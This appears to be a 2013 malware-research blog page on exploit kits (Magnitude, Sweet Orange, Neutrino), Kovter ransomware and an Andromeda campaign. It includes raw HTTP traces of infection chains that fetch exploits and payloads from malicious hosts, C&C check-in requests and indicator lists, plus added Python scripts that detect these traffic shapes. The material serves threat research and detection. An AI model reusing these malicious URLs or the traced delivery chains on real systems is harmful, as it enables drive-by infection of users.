8342 | 81.177.128.0/18 | RTCOMM | RU | JINO.RU | AVGURO TECHNOLOGIES LTD. HOSTING SERVICE PROVIDER
POST /jr2/gate.php HTTP/1.0
Host: esco.myjino.ru
Accept: */*
Accept-Encoding: none
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: application/x-www-form-urlencoded
Connection: Close

Content-Length: 196

Kovter becomes even more abominable. Also adds new targets.

In Kovter NL Design

Kovter is following Revoyem's path.
Double shock on victims and new targeted countries.

This evolution has been spotted by Rich from Malwarebytes


In this case the first part of the work (shocking victims with CP website) is not done by traffer/web redirection prior to infection, as some traffer for Styx Revoyem Thread were doing, but by the malware itself.

Kovter fiddler Trace
2013-10-21
(Thx for the comment pointing out a non-blurred zone)


I made a design gathering session. They dropped the Prism Theme for US and are back to former design :

Kovter US - Default (failover) 2013-10-21

They already added Germany at the end of September ( Spotted by Malekal on the 2013-09-29 )

Kovter DE 2013-10-21
And now the new designs are : ES, FR, GB, IT, NL, TR

Kovter FR 2013-10-21

Kovter ES 2013-10-21

Kovter GB 2013-10-21

Kovter IT 2013-10-21

Kovter NL 2013-10-21

Kovter TR 2013-10-21

Files :7 kovter samples (owncloud via goo.gl)
Disclaimer : You have been warned of what those samples are doing.
Sorry. Removed.

Exploit Kit pushing it :
The fast moving Sakura (domains in .pl ) previously on
78.129.143.10
20860 | 78.129.128.0/17 | IOMART | GB | IOMARTHOSTING.COM | IOMART HOSTING LIMITED
Now on
85.17.122.118:97
16265 | 85.17.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V.

C&C :
50.7.193.124
30058 | 50.7.192.0/19 | FDCSERVERS | CZ | FDCSERVERS.NET | FDCSERVERS.NET
svoirdwiz .biz
svoirdwiz .org

Big Andromeda Campaign back on track. From Sweet Orange to Neutrino



This is not the usual post I write, but I decided to go on as the campaign is quite big (enough to modify the EK market share feeling) and I have some compromised domains to share for remediation (see at the end).

A big campaign was active from at least 2013-09-27 to 2013-10-14.
A huge number of compromised websites were conditionally redirecting to a Sweet Orange pushing Andromeda : (Post by Sucuri about this campaign)

Sweet Orange 82 2013-09-27
Payload : Andromeda
One of the payload : 82735517dd73de39a17c01a74c4fa232 nicely named by Microsoft (as often)

The campaign was really widespread and was imo responsible for the feeling from some that Sweet Orange was prevailing after Paunch's  Arrest (so maybe in "tilt number" but I think most actors are on Neutrino, Magnitude and Nuclear Pack)

The campaign suddenly stopped redirecting to Sweet Orange on 2013-10-14 redirecting instead to google.com and the day after to [rotating].sytes.net/atb/counter.php then to google.

(Note: at same time 4-5 other Sweet Orange threads I was following also disappeared which made me tweet few days later

Note : have been pointed to at least 2 SWO threads that are still active )

That campaign has a huge place
by Sucuri


That campaign was still "on hold" yesterday ( BadwareBusters thread)

On Hold Campaign. Redirectin to Google
2013-10-22


The infection process is on again but redirecting now to Neutrino.
(it's enough to assume that actors can speak russian or are better than most of us at using google translate)

Neutrino thread pushing Andromeda

Having no access to a compromised server, and based on the way the redirection is handled, I thought it was driven by a rogue Apache module (Darkleech or CDorked, installed on the compromised server via Cpanel/Parallels Plesk server vulns), but it seems it's more likely compromised Joomla/Wordpress.

Payload I got (it's obviously rotating) :
1074b843c0b6e783ee1314c9759067a2 (sample - VT  - Malwr )
Am not 100% sure it's Andromeda but chances for it are really high...





-----
46.22.211.60
34702 | 46.22.208.0/20 | WAVECOM | EE | WAVECOM.EE | AKTSIASELTS WAVECOM
POST /rukomorsdx/forum.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0
Host: base.thecreatureteacher.com
Analysis by Joe Sandbox Cloud
-----
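The Andromeda check-in just above and the Jolly Roger gate.php call earlier on this page have the same shape: a small form-encoded POST to a PHP script, sent with a bare or ancient User-Agent, "Connection: close", no Referer and no compression offered. That shape is a usable proxy-log detection regardless of the specific host. The Python below is an added example, not code from the blog or from either malware family; the two malicious requests are reconstructed from the header lines shown on the page (request bodies are constructed filler), the browser request is constructed for contrast, and the indicator list and threshold are my assumptions.

```python
"""Score raw HTTP requests for the C&C check-in shape seen in these posts.

Added example, not code from the blog post. It parses a raw request and
counts simple indicators; a request matching most of them is reported.
Sample requests are reconstructed from the page's traces (bodies are
constructed); the indicators and the threshold are assumptions.
"""
import re

# Matches "Mozilla/4.0" alone or the old "Mozilla/4.0 (compatible; MSIE 5..7 ...)"
LEGACY_UA = re.compile(r"^Mozilla/4\.0(\s*\(compatible; MSIE [5-7]\.0;.*\))?$")


def parse_request(raw):
    """Split a raw HTTP request into method, target, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def c2_indicators(req):
    """Return the names of the check-in indicators this request matches."""
    h = req["headers"]
    hits = []
    if req["method"] == "POST" and req["target"].lower().endswith(".php"):
        hits.append("post-to-php-script")
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded") \
            and "referer" not in h:
        hits.append("form-post-without-referer")  # browsers send a Referer on form posts
    if LEGACY_UA.match(h.get("user-agent", "")):
        hits.append("legacy-or-bare-user-agent")
    if h.get("connection", "").lower() == "close":
        hits.append("connection-close")
    if h.get("accept-encoding", "").lower() in ("", "none"):
        hits.append("no-compression")
    return hits


def is_suspicious(req, threshold=4):
    """True when at least `threshold` indicators match (assumed cut-off)."""
    return len(c2_indicators(req)) >= threshold


def build(request_line, headers, body):
    return request_line + "\r\n" + "\r\n".join(headers) + \
        f"\r\nContent-Length: {len(body)}\r\n\r\n" + body


# Reconstructed from the Jolly Roger gate.php trace on the page; body constructed.
JOLLY_ROGER_CHECKIN = build("POST /jr2/gate.php HTTP/1.0", [
    "Host: esco.myjino.ru", "Accept: */*", "Accept-Encoding: none",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
    "Content-Type: application/x-www-form-urlencoded", "Connection: Close",
], "id=CONSTRUCTED_FILLER")

# Reconstructed from the Andromeda forum.php trace on the page; body constructed.
ANDROMEDA_CHECKIN = build("POST /rukomorsdx/forum.php HTTP/1.1", [
    "Content-Type: application/x-www-form-urlencoded", "Connection: close",
    "User-Agent: Mozilla/4.0", "Host: base.thecreatureteacher.com",
], "CONSTRUCTED_FILLER")

# Constructed benign browser form post for contrast.
BROWSER_LOGIN = build("POST /login.php HTTP/1.1", [
    "Host: shop.example", "Referer: https://shop.example/login",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/24.0",
    "Accept-Encoding: gzip, deflate",
    "Content-Type: application/x-www-form-urlencoded", "Connection: keep-alive",
], "user=alice&pass=CONSTRUCTED")

SAMPLES = {"jolly_roger": JOLLY_ROGER_CHECKIN,
           "andromeda": ANDROMEDA_CHECKIN,
           "browser_login": BROWSER_LOGIN}


def triage(named_requests):
    """Map each sample name to whether it looks like a C&C check-in."""
    return {name: is_suspicious(parse_request(raw)) for name, raw in named_requests.items()}


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, c2_indicators(parse_request(raw)))
```

Each indicator on its own is weak (plenty of legitimate scripts POST to .php and close the connection), which is why the example only reports a request when most of them line up; a real deployment would also add the host and path of the known gate as a high-confidence match.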

At least >8000 domains were redirecting to the rotator (but I think it's far more than that).
http://pastebin.com/raw.php?i=1vFNKdSW (Please use for remediation - some Cert (CA/CH/CZ/FR/FI/PL) should have already been informed)

<edit1 : 2013-11-01>
After a few days out (after that post), they are back again, using an intermediate redirector in : [rotating].dezit/counter.php

Counter-Andro gang back on Neutrino
Payload : 3b75c1b705ce8f0e4e3a09d137a842c1
</edit1>

Read More :
Neutrino: Caught in the Act - Karmina Aquino & Daavid  Hentunen - 2013-10-23 - F-Secure
Malware iFrame Campaign from Sytes(.)net Daniel Cid - 2013-10-03  Sucuri.net
Hello Neutrino ! (just one more Exploit Kit) 2013-03-17 - last update 2013-10-03

Magnitude EK : Pop Pop !

Magnitude


Magnitude is a community name chosen for an Exploit Kit previously referred to as "Popads".
Why Popads ?

Many days after it was first spotted, the driveby was being done using Malvert pushed via PopAds
And all landings were ending with popads.com

Magnitude 2013-03-22
Here referer : sweerl.biz

PopAds being a legit company fighting against malverts, we had to choose a proper name.

As we don't know its real name (if it has one), a video proposed by Will Metcalf from Emerging Threats reached a consensus

Community - Magnitude (Pop pop!)

(link : http://www.youtube.com/watch?v=q-_4mcYsQdE )

Since Paunch's arrest we are seeing more and more Magnitude.

User on an Underground Forum seeking for Magnitude (^^) to grow his botnet
The world upside down.
I would rank it 2nd in terms of users (behind Neutrino, and before Kore and Nuclear Pack).

Now let's see how it's "weaponized".
Disclaimer : as usual I may hide information on stuff that seems broken.

CVE-2013-2463 with click2play bypass :

Spotted inside on 2013-10-19 but was maybe there since 1 or 2 weeks.
CVE-2013-2463 + c2p bypass in Magnitude 2013-10-25
After that the computer is...slightly infected.
GET http://khncudlm.7rahdeqi .info/?7186035589665d9b107f00af07370800=v12&ed37c4cb4cd2b288135b06da53053859=[fakeUpperReferer].com&0e26f8b9e160a8b0e6176ce00d16f5db=[redacted].com
200 OK (text/html)

Magnitude Landing - Highlighted : the piece of code that won't be  404
rejected (UA based) with the configuration presented to the EK


GET http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/cc84e758a3b4611de79628ee89895e13.swf
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/131548a8413b7f63f89dff19f8563a5e
200 OK (text/html) (this is for CVE-2013-2551 see later)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/28322e8e52bc381204f0b1e65c40e174
200 OK (text/html)


jnlp for Click2Play Bypass on jre17u21


GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive) 1c3d690421a56c5c67e211d747df9b72

Piece of CVE-2013-2463 in Magnitude Jar


GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0
200 OK (text/html) Payload 1 c2a974e04298b557f976818200c879ab Stitur Ransomware

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/1
200 OK (text/html) Payload 2 ba923eb3b0968a58a090db1e3079080d <- Redyms. Thx Kimberly (Stopmalvertising).

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/2
200 OK (text/html) Payload 3 f577eef07ef8331311f93fe1918c6cc6 Kelihos Spambot/loader

(Out of scope -- do : 
85.255.57.253
GET /cuper02.exe HTTP/1.0 --> 004874bb466e6b8eb3dd7b09f7e3855d )

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/3
200 OK (text/html) Payload 4 (empty)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/4
200 OK (text/html) Payload 5 4903405b85b5584fa93a1e4591b80f64 Zaccess

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/5
200 OK (text/html) Payload 6 818f9ea202ce30645d2fb547ff1829f8 Vawtrak (Thx @virtualalloc for the information)


Note : 5 payloads, among which a ransomware. Not sure the beneficiary(ies) of the other payloads would appreciate it, as after a ransomware the computer goes for cleaning. Explanation ? I would say the owner of this Magnitude thread is selling loads from the same traffic to different customers/affiliates.
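The trace above is worth reading for its URL structure as much as for its payloads: the landing page is queried with 32-hex (MD5-looking) query-string keys, and every exploit and payload fetch lives under /<32hex>/<32hex>[.swf|.jar] or /<32hex>/<single digit>. That structure survives domain rotation, so it is a better proxy-log detection than any hostname. The Python below is an added example, not code from the blog or from the kit; the sample URLs are copied from the traces on this page (with the defanging space removed, and the bracketed referer placeholders replaced by constructed values) plus constructed benign URLs, and the regexes are my reading of that structure, not a published signature.

```python
"""Tag proxy-log URLs that match the Magnitude EK URL structure in the traces.

Added example, not part of the blog post. Classifies each URL as a landing
page (all query keys are 32-hex), an exploit fetch (/<32hex>/<32hex>[.swf|.jar]),
a payload fetch (/<32hex>/<digit>) or a class probe, then groups hits per host
so a full landing -> exploit -> payload chain stands out from a lone hit.
The regexes are assumptions drawn from the page's traces.
"""
import re
from urllib.parse import urlsplit, parse_qsl

HEX32 = r"[0-9a-f]{32}"
LANDING_KEY = re.compile(rf"^{HEX32}$")
EXPLOIT_PATH = re.compile(rf"^/{HEX32}/{HEX32}(\.swf|\.jar)?$")
PAYLOAD_PATH = re.compile(rf"^/{HEX32}/[0-9]$")
CLASS_PATH = re.compile(rf"^/{HEX32}/[a-z]\.class$")


def classify(url):
    """Return 'landing', 'exploit', 'payload', 'class-probe' or None."""
    parts = urlsplit(url)
    path = parts.path
    if path in ("", "/") and parts.query:
        keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
        if keys and all(LANDING_KEY.match(k) for k in keys):
            return "landing"
        return None
    if EXPLOIT_PATH.match(path):
        return "exploit"
    if PAYLOAD_PATH.match(path):
        return "payload"
    if CLASS_PATH.match(path):
        return "class-probe"
    return None


def chains(urls):
    """Group the kinds of hit seen per host: {host: sorted kinds}."""
    by_host = {}
    for u in urls:
        kind = classify(u)
        if kind:
            by_host.setdefault(urlsplit(u).hostname, set()).add(kind)
    return {h: sorted(k) for h, k in by_host.items()}


def full_chains(urls):
    """Hosts that served a landing page, an exploit and a payload: the
    high-confidence set a responder would pull the clients for."""
    return sorted(h for h, kinds in chains(urls).items()
                  if {"landing", "exploit", "payload"} <= set(kinds))


SAMPLE_URLS = [
    # From the page's first trace (referer placeholders replaced by constructed values)
    "http://khncudlm.7rahdeqi.info/?7186035589665d9b107f00af07370800=v12"
    "&ed37c4cb4cd2b288135b06da53053859=upper.example"
    "&0e26f8b9e160a8b0e6176ce00d16f5db=site.example",
    "http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/cc84e758a3b4611de79628ee89895e13.swf",
    "http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar",
    "http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/0",
    "http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/u.class",
    # From the page's second trace: a landing with a single hex key
    "http://ilkbxnmtce.1deepinsget.info/?e15023ac04e9f62ad61f23a2439a9b1e=29",
    # Constructed benign traffic
    "http://www.example.com/?q=test&page=2",
    "http://cdn.example.com/assets/app.js",
    # Constructed lone payload-shaped path on an otherwise clean host
    "http://www.example.com/a3f2c9e1d0b8f7a6c5d4e3f2a1b0c9d8/2",
]

if __name__ == "__main__":
    for host, kinds in chains(SAMPLE_URLS).items():
        print(host, kinds)
    print("full chains:", full_chains(SAMPLE_URLS))
```

The lone /<32hex>/2 on www.example.com shows why `full_chains` exists: a single hex-looking path segment is common enough on CDNs that the per-host grouping, not the individual regex, is what keeps the false-positive rate down.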

CVE-2011-3402 :

The CVE is inside (see below) but I couldn't get it to fire as it's overlapping with CVE-2013-2551.
Have some idea to trigger it. Will maybe update later.


CVE-2012-0507 :


I made the pass on the "ru8080" thread.  (Ex : /news/ BH EK )

CVE-2012-0507 Pass in Magnitude
So I was expecting a ZeusGameOver (Zeus P2P)...nada. Strange.....

GET http://ilkbxnmtce.1deepinsget .info/?e15023ac04e9f62ad61f23a2439a9b1e=29
200 OK (text/html)

Magnitude Landing - 2013-10-25
Highlighted the code that won't UA 404.
(3 jar calls (?) : <embed> for Firefox, <object> for IE ; <applet> has been deprecated )


GET http://ilkbxnmtce.1deepinsget .info/ff498283b05fd88b573e0cce15b22de5.eot
200 OK (application/vnd.ms-fontobject) CVE-2011-3402 <--

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/09c164f4b0f930b8c10c476ec5dbfbec.swf
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget.info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/8cc36c1a70beae826a15bb7df6ab5b1d
200 OK (text/html) CVE-2013-2551 (see later)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive) b075fbbe5e96e73a9a597062d6c01444


Piece of CVE-2012-0507 in Magnitude Jar


GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/0
200 OK (text/html) Payload 1 148ae098e23c4844ce25990643cc4150 Stitur

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/1
200 OK (text/html) Payload2 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/2
200 OK (text/html) Payload3 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/3
200 OK (text/html) Payload4 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/4
200 OK (text/html) Payload 5 07b8dafe506e56a40527b96722bf5c70

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/5
200 OK (text/html) Payload 6 empty

CVE-2013-2551 :

Inside since 2013-10-06

The first time I saw it, once decoded, it was a copy-paste of the code from HiMan EK (the kaf() function in HiMan had caught my attention for some reason).

I won't spend much time on that one.

CVE-2013-2551 successful pass in Magnitude - 2013-10-25


GET http://tpwqihdqrb.2deepinsget .info/?103cacc2431cf5b7bec74b56d3a60444=n11&2550a61eab180c8cfd230ffc41bf33ee=google.com&26f72647ceaa00ff4e35ed5ee16cf9fa=[redacted].com
200 OK (text/html)

Magnitude Landing 2013-10-25
Highlighted the code that will fire in this pass


GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/13cd72e17e6b22c976eeba91c2ab577a.swf
404 Not Found (text/html)

GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/6f1ed403773ad2b9dd44dc0fbcefadef
200 OK (text/html)

Piece of CVE-2013-2551 in Magnitude 2013-10-25


GET http://5.79.85 .237/?eade56046ab80efc3a5dd1dd83f78258
200 OK (text/html) Payload 1 : df1ada88e40a58da18dc4b408600e0a5 Winwebsec

(OT: do: 219.235.1.127 GET /api/dom/no_respond/?ts=8aad4fca6d94d7b467bbaed2d1747d2e5a1cb210&token=sysdocx1&group=asp&nid=264D4000&lid=0058&ver=0058&affid=76900&dx=0 HTTP/1.1 <-- FakeAV: Winwebsec)

GET http://5.79.85 .237/?4c9a37a894f9cee76c89df68f4c18615
200 OK (text/html) Payload 2 : 4b9c8466cae1da89923ac89eca79db2a (Kelihos Spambot)

GET http://5.79.85 .237/?8dc8e224de9248e8e1cb72ceac8a5599
200 OK (text/html) Payload 3 : 2188d6a0d622d23a9c9bb7208a9f388c (Kelihos Spambot ..again (?!?) )

GET http://5.79.85 .237/?28847bf8f7c082fcd967ac01dbaec03e
200 OK (text/html) Payload 4 (empty)

GET http://5.79.85 .237/?cf20e7e042371ed8b65339bbd931e8b3
200 OK (text/html) Payload 5 : 0ac65603f3519ac09187b35df203905f Zaccess

GET http://5.79.85 .237/?ac339e60d0e6eeb0e5a1caa4d11c2fe5
200 OK (text/html) Payload 6 (empty)

(In some configurations you get the Java call too, but most of the time IE crashes before that)

CVE-2013-0634 (?) :

If so, it has been inside since at least 2013-03-22

CVE-2013-0634 (?) CVE Path




GET http://vedktnyo.3deepinsget .info/?c372e0cf1d9e9ec9b56349796a1ceb22=34
200 OK (text/html)



GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/100b9090c5f6d6577b33fb8ece0c4d45.swf
200 OK (application/x-shockwave-flash) 3f4261ccc6edb559e623906472d5cd2f So CVE-2013-0634 (?)... I can't figure this out for sure. Help would be greatly appreciated :)
Sample and Associated Fiddler (Owncloud)

GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/882173c54e09bf0968cbda6b32c1d145
200 OK (text/html) CVE-2013-2551 (see before)

GET http://gabetiznol .info/calculator.exe
200 OK (text/html) aeaf204a9e5e6dd55d2a85ae1b7a0dd1 

------
Off Topic Payload :

74.86.20.50 http://twinkcam .net/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
36351 | 74.86.0.0/16 | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.

216.17.105.36 http://cinnamyn .com/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

30266 | 216.17.104.0/21 | A1COLO-COM | US | A1COLO.COM | A1COLO.COM
74.86.20.50 http://saggerboy .com/twg/b.php?id=92.1
User-Agent: Mozilla

Want to know more? S!ri's posts about it
--------

<edit1 2013-11-07>
After around 8 hours of maintenance, during which the thread links were replying with "stoptraff", Magnitude is back with small changes.

Magnitude Landing change on 2013-11-07
</edit1>

Exploitation Graph :


Magnitude Exploitation Graph
2013-10-26
To simplify: no plugin detection. Your browser is told to fetch all the bullets; those that do not fit (server-side User-Agent check) are then refused.
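One way a defender can turn that behaviour into a proxy-log check, as an added example that is not code from the original post: it parses constructed log lines in a simple `METHOD URL STATUS CONTENT-TYPE` form modelled on the Fiddler trace above, labels the request kinds Magnitude emits (a landing with a 32-hex query parameter, same-session `/<hex32>/<hex32>` bullets, an `.eot` font, numbered payload slots, and 404 refusals of bullets that do not fit the User-Agent), and flags a host only when the whole landing -> bullets -> payload chain is present. The host names `ek-host.example`, `www.example.com` and `cdn.example.com` and the log format are assumptions; the path tokens are copied from the trace above.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

HEX32 = r"[0-9a-f]{32}"
RE_HEX32 = re.compile(rf"^{HEX32}$")
# /<session>/<bullet>, /<session>/<bullet>.swf or /<session>/<payload slot number>
RE_SESSION_PATH = re.compile(rf"^/{HEX32}/({HEX32}(?:\.swf)?|\d+)$")
# /<hex32>.eot (the embedded-font bullet seen in the trace)
RE_FONT_PATH = re.compile(rf"^/{HEX32}\.eot$")

# Constructed sample log (placeholder hosts; path tokens copied from the trace above).
SAMPLE_LOG = """\
GET http://ek-host.example/?e15023ac04e9f62ad61f23a2439a9b1e=29 200 text/html
GET http://ek-host.example/ff498283b05fd88b573e0cce15b22de5.eot 200 application/vnd.ms-fontobject
GET http://ek-host.example/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/09c164f4b0f930b8c10c476ec5dbfbec.swf 404 text/html
GET http://ek-host.example/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/8cc36c1a70beae826a15bb7df6ab5b1d 200 text/html
GET http://ek-host.example/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db 404 text/html
GET http://ek-host.example/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c 200 application/x-java-archive
GET http://ek-host.example/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/0 200 text/html
GET http://ek-host.example/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/1 200 text/html
GET http://www.example.com/index.html 200 text/html
GET http://cdn.example.com/assets/0123456789abcdef0123456789abcdef.js 200 application/javascript
"""


def parse_line(line):
    """Split 'METHOD URL STATUS CONTENT-TYPE' into its parts; None for anything else."""
    parts = line.split()
    if len(parts) != 4 or not parts[2].isdigit():
        return None
    method, url, status, ctype = parts
    u = urlsplit(url)
    return {"method": method, "host": u.hostname, "path": u.path,
            "query": u.query, "status": int(status), "ctype": ctype}


def classify(req):
    """Label one request with the role it plays in a Magnitude-style chain, or None."""
    if req["path"] in ("", "/"):
        keys = [k for k, _ in parse_qsl(req["query"], keep_blank_values=True)]
        if keys and all(RE_HEX32.match(k) for k in keys):
            return "landing"          # ?<hex32>=<thread id>
        return None
    m = RE_SESSION_PATH.match(req["path"])
    if m:
        tail = m.group(1)
        if tail.isdigit():
            return "payload"          # numbered payload slots 0, 1, 2, ...
        if tail.endswith(".swf"):
            return "flash"
        if req["ctype"] == "application/x-java-archive":
            return "jar"
        return "exploit"              # HTML exploit page, or a bullet refused with 404
    if RE_FONT_PATH.match(req["path"]) and req["ctype"] == "application/vnd.ms-fontobject":
        return "font"
    return None


def analyse(log_text):
    """Return {host: (verdict, counts)} for hosts showing the full landing -> bullets -> payload chain."""
    per_host = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        label = classify(req)
        if label is None:
            continue
        counts = per_host[req["host"]]
        counts[label] += 1
        if req["status"] == 404:
            counts["refused"] += 1    # server-side User-Agent check said no
    verdicts = {}
    for host, counts in per_host.items():
        kinds = {k for k in counts if k != "refused"}
        # require the landing, at least one payload slot and some kind of bullet in between
        if {"landing", "payload"} <= kinds and len(kinds) >= 3:
            verdicts[host] = ("magnitude-like chain", dict(counts))
    return verdicts


if __name__ == "__main__":
    for host, (verdict, counts) in analyse(SAMPLE_LOG).items():
        print(host, verdict, counts)
```

The check deliberately keys on the shape of the whole session (landing, several 32-hex bullets under one session token, numbered payload slots, 404s for refused bullets) rather than on any single host or hash, since the kit rotates hostnames and tokens per visitor; a lone `/assets/<hex>.js` on a CDN does not trip it.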

Thanks : Chris Wakelin and Will Metcalf

CVE-2013-2551 and Exploit Kits



A late post to sum up what has been seen in Exploit Kits regarding CVE-2013-2551.
This vulnerability was exploited by VUPEN during Pwn2Own 2013, on 2013-03-07.

First mention was by Yonathan Klijnsma from Fox-IT for Neutrino on 2013-09-10.


Malforsec wrote a post about it.
I never got a positive infection with it.

Simultaneous pass on 2 threads of Neutrino
2013-09-14 - Piece of CVE-2013-2551

On 2013-09-25 Yonathan spotted it in Fiesta.
and made a post about it. Once again I could see it fire, but it did not own the box here. I don't know why.

Fiesta pass firing CVE-2013-2551 (no infection)
2013-10-05
On 2013-10-01 I spotted it on HiMan Exploit Kit, where I saw it working properly.


On 2013-10-05 it was being integrated in Styx

The code was exactly the same as the one in HiMan EK (the kaf() function was the hint that allowed me to notice it quickly).

On 2013-10-06 it appeared in Magnitude :
On 2013-10-13 I saw it in Nuclear Pack
<edit1 2013-11-09>
Sweet Orange :
Spotted by EKWatcher, it's now in Sweet Orange.

Landing size doubled from:

Sweet Orange - 2013-11-09 02:51
to

Sweet Orange - 2013-11-09 14:48

GET http://kytus.allseasoninvesting .com:6173/order_temp/sshadmin/lol/amazon.php?english=3
200 OK (text/html)

GET http://bafes.thienchualatinhyeu .com:6173/members.php?files=588&quote=291&pets=4&sales=199&star=171&front=343&staff=37&virus=398&mail=378
200 OK (application/octet-stream) 0b17503fe267660f08d1bc23fa89cb8d <- Urausy

Urausy - Piece of BE Design 2013-11-09
</edit1>

Files : Here some fiddler (Owncloud via Goo.gl)

Read More :
Fiesta Exploit Kit analysis serving MSIE exploit CVE-2013-2551 - 2013-09-27 - Yonathan Klijnsma
Neutrino EK - IE exploit analysis - 2013-09-17 - Malforsec
CVE-2013-2551 MS13-037 Internet Explorer Vulnerability Metasploit Demo - 2013-06-12 - Eromang Blog
VUPEN Advanced Exploitation of Internet Explorer 10 / Windows 8 Overflow (Pwn2Own 2013) 2013-05-22 - Nicolas Joly - Vupen

Inside a (The?) Simda Affiliate : Партнёрка Podmena (formerly Chesto)



Simda being distributed in Affiliate mode can be found via many different infection vectors.
But it's the only payload of what I call "Styx Kein"

First mention of this Styx "instance" I found comes from the wizard behind KahuSecurity :
Analyzing a New Exploit Pack - 2012-08-15
This is where "Kein" comes from. (based on Domains used by this EK)

Styx "Kein" 2013-03-02
Could also be referred to as www312


Styx "Kein" 2013-03-30
